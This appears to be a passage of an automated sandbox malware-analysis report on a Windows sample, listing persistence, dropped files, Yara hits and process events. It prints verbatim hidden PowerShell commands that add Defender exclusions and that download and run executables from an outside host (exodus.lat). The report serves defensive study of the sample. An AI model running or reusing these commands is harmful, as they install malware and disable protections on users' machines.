                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
                                  Yara detected Costura Assembly Loader
                                  Source: Yara matchFile source: 47.0.COMSurrogate.exe.1ee64180000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 31.0.smartscreen.exe.1eb2ab20000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.RegAsm.exe.3c9d977.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.RegAsm.exe.3c9d977.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.RegAsm.exe.3c7491a.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.RegAsm.exe.3c7491a.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000037.00000002.4566695155.000002748FD21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001F.00000002.4565494964.000001EB2C781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002F.00000000.3929689424.000001EE64182000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4566717122.000001F78A821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000036.00000002.4565336493.0000021535001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002F.00000002.4566859084.000001EE65D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001F.00000000.3856204224.000001EB2AB22000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000016.00000002.4603685340.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: smartscreen.exe PID: 2488, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\smartscreen.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe, type: DROPPED
                                  Source: smartscreen.exe.22.drStatic PE information: 0xA67CE10C [Sat Jul 6 17:25:32 2058 UTC]
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                                  Source: DM6vAAgoCw.exeStatic PE information: real checksum: 0x6ed3f5 should be: 0x6fd4a7
                                  Source: mi.exe.47.drStatic PE information: real checksum: 0x0 should be: 0x6280f4
                                  Source: COMSurrogate.exe.38.drStatic PE information: real checksum: 0x0 should be: 0x31fa2
                                  Source: smartscreen.exe.22.drStatic PE information: real checksum: 0x0 should be: 0x3150c
                                  Source: mi.exe.47.drStatic PE information: section name: _RANDOMX
                                  Source: mi.exe.47.drStatic PE information: section name: _TEXT_CN
                                  Source: mi.exe.47.drStatic PE information: section name: _TEXT_CN
                                  Source: mi.exe.47.drStatic PE information: section name: _RDATA
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00658B75 push ecx; ret 18_2_00658B88
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0064CBF4 push eax; retf 18_2_0064CBF8
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06DB4C60 push esp; ret 22_2_06DB4C61
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06DB59F2 push eax; retf 22_2_06DB59F9
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeCode function: 31_2_00007FFD348A00BD pushad ; iretd 31_2_00007FFD348A00C1
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeCode function: 47_2_00007FFD348900BD pushad ; iretd 47_2_00007FFD348900C1
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeCode function: 50_2_00007FFD348900BD pushad ; iretd 50_2_00007FFD348900C1
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeCode function: 53_2_00007FFD348B00BD pushad ; iretd 53_2_00007FFD348B00C1
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeCode function: 54_2_00007FFD348B00BD pushad ; iretd 54_2_00007FFD348B00C1
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeCode function: 55_2_00007FFD348A00BD pushad ; iretd 55_2_00007FFD348A00C1
                                  Source: smartscreen.exe.22.drStatic PE information: section name: .text entropy: 7.948742985384125
                                  Source: COMSurrogate.exe.38.drStatic PE information: section name: .text entropy: 7.954562345775779

                                  Persistence and Installation Behavior

                                  barindex
                                  Drops PE files with a suspicious file extension
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comFile created: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrJump to dropped file
                                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\491505\Dr.comJump to dropped file
                                  Sample is not signed and drops a device driver
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeFile created: C:\Users\user\AppData\Local\asm\WinRing0x64.sys
                                  Tries to download and execute files (via powershell)
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comFile created: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\asm\COMSurrogate.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comFile created: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeFile created: C:\Users\user\AppData\Local\asm\WinRing0x64.sysJump to dropped file
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeFile created: C:\Users\user\AppData\Local\Temp\CommissionerJump to dropped file
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeFile created: C:\Users\user\AppData\Local\asm\mi.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\491505\Dr.comJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\smartscreen.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeFile created: C:\Users\user\AppData\Local\Temp\CommissionerJump to dropped file

                                  Boot Survival

                                  barindex
                                  Creates multiple autostart registry keys
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SmartScreen
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run COM Surrogate
                                  Uses schtasks.exe or at.exe to add and modify task schedules
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SmartScreen
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SmartScreen
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run COM Surrogate
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run COM Surrogate

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Loading BitLocker PowerShell Module
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,18_2_006B59B3
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00645EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,18_2_00645EDA
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_006533B7
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
